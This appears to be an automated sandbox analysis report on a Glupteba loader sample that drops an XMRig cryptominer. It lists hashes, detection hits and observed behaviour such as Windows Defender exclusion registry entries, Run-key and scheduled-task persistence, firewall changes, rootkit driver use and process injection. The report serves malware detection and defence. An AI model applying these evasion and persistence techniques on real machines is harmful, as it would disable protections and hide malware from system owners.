glupteba | c20ed57b9e9882e696f6f65fb55dfa294dca073c03b48ebf35b6ecbaeb96584f

Analysis

max time kernel
290s
max time network
295s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
18-04-2024 23:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

c20ed57b9e9882e696f6f65fb55dfa294dca073c03b48ebf35b6ecbaeb96584f.exe
Size

4.2MB
MD5

a4734cab18c1867dd826d1bc77803448
SHA1

1c7be6a15941733206382aa51d0f08e46e9e5d59
SHA256

c20ed57b9e9882e696f6f65fb55dfa294dca073c03b48ebf35b6ecbaeb96584f
SHA512

bcc9d94788b600592cfc08a9e004bc1d444aab2236b340d11a828342d338b2aca840240f278cdc228529d9f5534f59c15d0e100a0b188ece2a1eb37d0d3512ea
SSDEEP

98304:5vWWHN1fH0B//M8+JHmTcLG3+4bVMShZOv4YroygT:517U//MsTcLGdFhUwYry

Score

10^/10

glupteba xmrig discovery dropper evasion loader miner persistence rootkit trojan upx

Malware Config

Signatures

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba payload 36 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4716-2-0x0000000005090000-0x000000000597B000-memory.dmp	family_glupteba
behavioral2/memory/4716-3-0x0000000000400000-0x000000000300A000-memory.dmp	family_glupteba
behavioral2/memory/4716-300-0x0000000000400000-0x000000000300A000-memory.dmp	family_glupteba
behavioral2/memory/4716-302-0x0000000005090000-0x000000000597B000-memory.dmp	family_glupteba
behavioral2/memory/4264-306-0x0000000000400000-0x000000000300A000-memory.dmp	family_glupteba
behavioral2/memory/4264-818-0x0000000000400000-0x000000000300A000-memory.dmp	family_glupteba
behavioral2/memory/4264-825-0x0000000000400000-0x000000000300A000-memory.dmp	family_glupteba
behavioral2/memory/4264-1043-0x0000000000400000-0x000000000300A000-memory.dmp	family_glupteba
behavioral2/memory/2692-1049-0x0000000000400000-0x000000000300A000-memory.dmp	family_glupteba
behavioral2/memory/2692-1786-0x0000000000400000-0x000000000300A000-memory.dmp	family_glupteba
behavioral2/memory/2692-1787-0x0000000000400000-0x000000000300A000-memory.dmp	family_glupteba
behavioral2/memory/2692-1796-0x0000000000400000-0x000000000300A000-memory.dmp	family_glupteba
behavioral2/memory/2692-1798-0x0000000000400000-0x000000000300A000-memory.dmp	family_glupteba
behavioral2/memory/2692-1800-0x0000000000400000-0x000000000300A000-memory.dmp	family_glupteba
behavioral2/memory/2692-1802-0x0000000000400000-0x000000000300A000-memory.dmp	family_glupteba
behavioral2/memory/2692-1804-0x0000000000400000-0x000000000300A000-memory.dmp	family_glupteba
behavioral2/memory/2692-1806-0x0000000000400000-0x000000000300A000-memory.dmp	family_glupteba
behavioral2/memory/2692-1808-0x0000000000400000-0x000000000300A000-memory.dmp	family_glupteba
behavioral2/memory/2692-1810-0x0000000000400000-0x000000000300A000-memory.dmp	family_glupteba
behavioral2/memory/2692-1812-0x0000000000400000-0x000000000300A000-memory.dmp	family_glupteba
behavioral2/memory/2692-1814-0x0000000000400000-0x000000000300A000-memory.dmp	family_glupteba
behavioral2/memory/2692-1816-0x0000000000400000-0x000000000300A000-memory.dmp	family_glupteba
behavioral2/memory/2692-1818-0x0000000000400000-0x000000000300A000-memory.dmp	family_glupteba
behavioral2/memory/2692-1820-0x0000000000400000-0x000000000300A000-memory.dmp	family_glupteba
behavioral2/memory/2692-1822-0x0000000000400000-0x000000000300A000-memory.dmp	family_glupteba
behavioral2/memory/2692-1824-0x0000000000400000-0x000000000300A000-memory.dmp	family_glupteba
behavioral2/memory/2692-1826-0x0000000000400000-0x000000000300A000-memory.dmp	family_glupteba
behavioral2/memory/2692-1828-0x0000000000400000-0x000000000300A000-memory.dmp	family_glupteba
behavioral2/memory/2692-1830-0x0000000000400000-0x000000000300A000-memory.dmp	family_glupteba
behavioral2/memory/2692-1832-0x0000000000400000-0x000000000300A000-memory.dmp	family_glupteba
behavioral2/memory/2692-1834-0x0000000000400000-0x000000000300A000-memory.dmp	family_glupteba
behavioral2/memory/2692-1836-0x0000000000400000-0x000000000300A000-memory.dmp	family_glupteba
behavioral2/memory/2692-1838-0x0000000000400000-0x000000000300A000-memory.dmp	family_glupteba
behavioral2/memory/2692-1840-0x0000000000400000-0x000000000300A000-memory.dmp	family_glupteba
behavioral2/memory/2692-1842-0x0000000000400000-0x000000000300A000-memory.dmp	family_glupteba
behavioral2/memory/2692-1844-0x0000000000400000-0x000000000300A000-memory.dmp	family_glupteba

Windows security bypass 2 TTPs 7 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Processes:

c20ed57b9e9882e696f6f65fb55dfa294dca073c03b48ebf35b6ecbaeb96584f.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"	c20ed57b9e9882e696f6f65fb55dfa294dca073c03b48ebf35b6ecbaeb96584f.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\c20ed57b9e9882e696f6f65fb55dfa294dca073c03b48ebf35b6ecbaeb96584f.exe = "0"	c20ed57b9e9882e696f6f65fb55dfa294dca073c03b48ebf35b6ecbaeb96584f.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	c20ed57b9e9882e696f6f65fb55dfa294dca073c03b48ebf35b6ecbaeb96584f.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	c20ed57b9e9882e696f6f65fb55dfa294dca073c03b48ebf35b6ecbaeb96584f.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	c20ed57b9e9882e696f6f65fb55dfa294dca073c03b48ebf35b6ecbaeb96584f.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	c20ed57b9e9882e696f6f65fb55dfa294dca073c03b48ebf35b6ecbaeb96584f.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"	c20ed57b9e9882e696f6f65fb55dfa294dca073c03b48ebf35b6ecbaeb96584f.exe

XMRig Miner payload 2 IoCs

miner

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\csrss\wup\xarch\wup.exe	family_xmrig
C:\Users\Admin\AppData\Local\Temp\csrss\wup\xarch\wup.exe	xmrig

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Modifies Windows Firewall 2 TTPs 1 IoCs
evasion

Windows Service
T1543.003

Disable or Modify System Firewall
T1562.004

Processes:

netsh.exe

pid process

3544 netsh.exe
Executes dropped EXE 4 IoCs

Processes:

csrss.exeinjector.exewindefender.exewindefender.exe

pid process

2692 csrss.exe
2456 injector.exe
1068 windefender.exe
4764 windefender.exe

pid	process
3544	netsh.exe

pid	process
2692	csrss.exe
2456	injector.exe
1068	windefender.exe
4764	windefender.exe

UPX packed file 6 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Windows\windefender.exe	upx
behavioral2/memory/1068-1794-0x0000000000400000-0x00000000008DF000-memory.dmp	upx
behavioral2/memory/4764-1797-0x0000000000400000-0x00000000008DF000-memory.dmp	upx
behavioral2/memory/4764-1801-0x0000000000400000-0x00000000008DF000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe	upx
behavioral2/memory/3632-2127-0x0000000000400000-0x00000000008E1000-memory.dmp	upx

Windows security modification 2 TTPs 7 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Processes:

c20ed57b9e9882e696f6f65fb55dfa294dca073c03b48ebf35b6ecbaeb96584f.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	c20ed57b9e9882e696f6f65fb55dfa294dca073c03b48ebf35b6ecbaeb96584f.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	c20ed57b9e9882e696f6f65fb55dfa294dca073c03b48ebf35b6ecbaeb96584f.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	c20ed57b9e9882e696f6f65fb55dfa294dca073c03b48ebf35b6ecbaeb96584f.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	c20ed57b9e9882e696f6f65fb55dfa294dca073c03b48ebf35b6ecbaeb96584f.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"	c20ed57b9e9882e696f6f65fb55dfa294dca073c03b48ebf35b6ecbaeb96584f.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"	c20ed57b9e9882e696f6f65fb55dfa294dca073c03b48ebf35b6ecbaeb96584f.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\c20ed57b9e9882e696f6f65fb55dfa294dca073c03b48ebf35b6ecbaeb96584f.exe = "0"	c20ed57b9e9882e696f6f65fb55dfa294dca073c03b48ebf35b6ecbaeb96584f.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

c20ed57b9e9882e696f6f65fb55dfa294dca073c03b48ebf35b6ecbaeb96584f.execsrss.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	c20ed57b9e9882e696f6f65fb55dfa294dca073c03b48ebf35b6ecbaeb96584f.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	csrss.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Manipulates WinMonFS driver. 1 IoCs
Roottkits write to WinMonFS to hide directories/files from being detected.
rootkit evasion

Processes:

csrss.exe

description ioc process

File opened for modification \??\WinMonFS csrss.exe

description	ioc	process
File opened for modification	\??\WinMonFS	csrss.exe

Drops file in System32 directory 7 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe

Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

System Information Discovery
T1082

Processes:

c20ed57b9e9882e696f6f65fb55dfa294dca073c03b48ebf35b6ecbaeb96584f.exe

description ioc process

File opened (read-only) \??\VBoxMiniRdrDN c20ed57b9e9882e696f6f65fb55dfa294dca073c03b48ebf35b6ecbaeb96584f.exe

description	ioc	process
File opened (read-only)	\??\VBoxMiniRdrDN	c20ed57b9e9882e696f6f65fb55dfa294dca073c03b48ebf35b6ecbaeb96584f.exe

Drops file in Windows directory 4 IoCs

Processes:

csrss.exec20ed57b9e9882e696f6f65fb55dfa294dca073c03b48ebf35b6ecbaeb96584f.exe

description	ioc	process
File created	C:\Windows\windefender.exe	csrss.exe
File opened for modification	C:\Windows\windefender.exe	csrss.exe
File opened for modification	C:\Windows\rss	c20ed57b9e9882e696f6f65fb55dfa294dca073c03b48ebf35b6ecbaeb96584f.exe
File created	C:\Windows\rss\csrss.exe	c20ed57b9e9882e696f6f65fb55dfa294dca073c03b48ebf35b6ecbaeb96584f.exe

Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exe

pid process

1136 sc.exe
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exeschtasks.exe

pid process

1744 schtasks.exe
2248 schtasks.exe

pid	process
1136	sc.exe

pid	process
1744	schtasks.exe
2248	schtasks.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

windefender.exepowershell.exepowershell.exec20ed57b9e9882e696f6f65fb55dfa294dca073c03b48ebf35b6ecbaeb96584f.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-432 = "Iran Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-1802 = "Line Islands Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-1412 = "Syria Standard Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2632 = "Norfolk Standard Time"	c20ed57b9e9882e696f6f65fb55dfa294dca073c03b48ebf35b6ecbaeb96584f.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-335 = "Jordan Standard Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-448 = "Azerbaijan Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-732 = "Fiji Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-211 = "Pacific Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-791 = "SA Western Daylight Time"	c20ed57b9e9882e696f6f65fb55dfa294dca073c03b48ebf35b6ecbaeb96584f.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-911 = "Mauritius Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-772 = "Montevideo Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1931 = "Russia TZ 11 Daylight Time"	c20ed57b9e9882e696f6f65fb55dfa294dca073c03b48ebf35b6ecbaeb96584f.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1832 = "Russia TZ 2 Standard Time"	c20ed57b9e9882e696f6f65fb55dfa294dca073c03b48ebf35b6ecbaeb96584f.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1502 = "Turkey Standard Time"	c20ed57b9e9882e696f6f65fb55dfa294dca073c03b48ebf35b6ecbaeb96584f.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-491 = "India Daylight Time"	c20ed57b9e9882e696f6f65fb55dfa294dca073c03b48ebf35b6ecbaeb96584f.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-531 = "Sri Lanka Daylight Time"	c20ed57b9e9882e696f6f65fb55dfa294dca073c03b48ebf35b6ecbaeb96584f.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-651 = "AUS Central Daylight Time"	c20ed57b9e9882e696f6f65fb55dfa294dca073c03b48ebf35b6ecbaeb96584f.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time"	c20ed57b9e9882e696f6f65fb55dfa294dca073c03b48ebf35b6ecbaeb96584f.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2842 = "Saratov Standard Time"	windefender.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2841 = "Saratov Daylight Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2041 = "Eastern Daylight Time (Mexico)"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-1411 = "Syria Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2391 = "Aleutian Daylight Time"	c20ed57b9e9882e696f6f65fb55dfa294dca073c03b48ebf35b6ecbaeb96584f.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-442 = "Arabian Standard Time"	c20ed57b9e9882e696f6f65fb55dfa294dca073c03b48ebf35b6ecbaeb96584f.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-181 = "Mountain Daylight Time (Mexico)"	c20ed57b9e9882e696f6f65fb55dfa294dca073c03b48ebf35b6ecbaeb96584f.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-221 = "Alaskan Daylight Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-301 = "Romance Daylight Time"	c20ed57b9e9882e696f6f65fb55dfa294dca073c03b48ebf35b6ecbaeb96584f.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2592 = "Tocantins Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-912 = "Mauritius Standard Time"	c20ed57b9e9882e696f6f65fb55dfa294dca073c03b48ebf35b6ecbaeb96584f.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-241 = "Samoa Daylight Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exec20ed57b9e9882e696f6f65fb55dfa294dca073c03b48ebf35b6ecbaeb96584f.exepowershell.exec20ed57b9e9882e696f6f65fb55dfa294dca073c03b48ebf35b6ecbaeb96584f.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeinjector.execsrss.exe

pid	process
2624	powershell.exe
2624	powershell.exe
2624	powershell.exe
4716	c20ed57b9e9882e696f6f65fb55dfa294dca073c03b48ebf35b6ecbaeb96584f.exe
4716	c20ed57b9e9882e696f6f65fb55dfa294dca073c03b48ebf35b6ecbaeb96584f.exe
1928	powershell.exe
1928	powershell.exe
1928	powershell.exe
4264	c20ed57b9e9882e696f6f65fb55dfa294dca073c03b48ebf35b6ecbaeb96584f.exe
4264	c20ed57b9e9882e696f6f65fb55dfa294dca073c03b48ebf35b6ecbaeb96584f.exe
4264	c20ed57b9e9882e696f6f65fb55dfa294dca073c03b48ebf35b6ecbaeb96584f.exe
4264	c20ed57b9e9882e696f6f65fb55dfa294dca073c03b48ebf35b6ecbaeb96584f.exe
4264	c20ed57b9e9882e696f6f65fb55dfa294dca073c03b48ebf35b6ecbaeb96584f.exe
4264	c20ed57b9e9882e696f6f65fb55dfa294dca073c03b48ebf35b6ecbaeb96584f.exe
4264	c20ed57b9e9882e696f6f65fb55dfa294dca073c03b48ebf35b6ecbaeb96584f.exe
4264	c20ed57b9e9882e696f6f65fb55dfa294dca073c03b48ebf35b6ecbaeb96584f.exe
4264	c20ed57b9e9882e696f6f65fb55dfa294dca073c03b48ebf35b6ecbaeb96584f.exe
4264	c20ed57b9e9882e696f6f65fb55dfa294dca073c03b48ebf35b6ecbaeb96584f.exe
3704	powershell.exe
3704	powershell.exe
3704	powershell.exe
1816	powershell.exe
1816	powershell.exe
1816	powershell.exe
4632	powershell.exe
4632	powershell.exe
4632	powershell.exe
4496	powershell.exe
4496	powershell.exe
4496	powershell.exe
4544	powershell.exe
4544	powershell.exe
4544	powershell.exe
2456	injector.exe
2456	injector.exe
2456	injector.exe
2456	injector.exe
2456	injector.exe
2456	injector.exe
2692	csrss.exe
2692	csrss.exe
2456	injector.exe
2456	injector.exe
2456	injector.exe
2456	injector.exe
2456	injector.exe
2456	injector.exe
2692	csrss.exe
2692	csrss.exe
2456	injector.exe
2456	injector.exe
2456	injector.exe
2456	injector.exe
2456	injector.exe
2456	injector.exe
2692	csrss.exe
2692	csrss.exe
2456	injector.exe
2456	injector.exe
2456	injector.exe
2456	injector.exe
2456	injector.exe
2456	injector.exe
2456	injector.exe

Suspicious use of AdjustPrivilegeToken 13 IoCs

Processes:

powershell.exec20ed57b9e9882e696f6f65fb55dfa294dca073c03b48ebf35b6ecbaeb96584f.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.execsrss.exesc.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	2624	powershell.exe
Token: SeDebugPrivilege	4716	c20ed57b9e9882e696f6f65fb55dfa294dca073c03b48ebf35b6ecbaeb96584f.exe
Token: SeImpersonatePrivilege	4716	c20ed57b9e9882e696f6f65fb55dfa294dca073c03b48ebf35b6ecbaeb96584f.exe
Token: SeDebugPrivilege	1928	powershell.exe
Token: SeDebugPrivilege	3704	powershell.exe
Token: SeDebugPrivilege	1816	powershell.exe
Token: SeDebugPrivilege	4632	powershell.exe
Token: SeDebugPrivilege	4496	powershell.exe
Token: SeDebugPrivilege	4544	powershell.exe
Token: SeSystemEnvironmentPrivilege	2692	csrss.exe
Token: SeSecurityPrivilege	1136	sc.exe
Token: SeSecurityPrivilege	1136	sc.exe
Token: SeDebugPrivilege	4632	powershell.exe

Suspicious use of WriteProcessMemory 39 IoCs

Processes:

c20ed57b9e9882e696f6f65fb55dfa294dca073c03b48ebf35b6ecbaeb96584f.exec20ed57b9e9882e696f6f65fb55dfa294dca073c03b48ebf35b6ecbaeb96584f.execmd.execsrss.exewindefender.execmd.exe

description	pid	process	target process
PID 4716 wrote to memory of 2624	4716	c20ed57b9e9882e696f6f65fb55dfa294dca073c03b48ebf35b6ecbaeb96584f.exe	powershell.exe
PID 4716 wrote to memory of 2624	4716	c20ed57b9e9882e696f6f65fb55dfa294dca073c03b48ebf35b6ecbaeb96584f.exe	powershell.exe
PID 4716 wrote to memory of 2624	4716	c20ed57b9e9882e696f6f65fb55dfa294dca073c03b48ebf35b6ecbaeb96584f.exe	powershell.exe
PID 4264 wrote to memory of 1928	4264	c20ed57b9e9882e696f6f65fb55dfa294dca073c03b48ebf35b6ecbaeb96584f.exe	powershell.exe
PID 4264 wrote to memory of 1928	4264	c20ed57b9e9882e696f6f65fb55dfa294dca073c03b48ebf35b6ecbaeb96584f.exe	powershell.exe
PID 4264 wrote to memory of 1928	4264	c20ed57b9e9882e696f6f65fb55dfa294dca073c03b48ebf35b6ecbaeb96584f.exe	powershell.exe
PID 4264 wrote to memory of 4280	4264	c20ed57b9e9882e696f6f65fb55dfa294dca073c03b48ebf35b6ecbaeb96584f.exe	cmd.exe
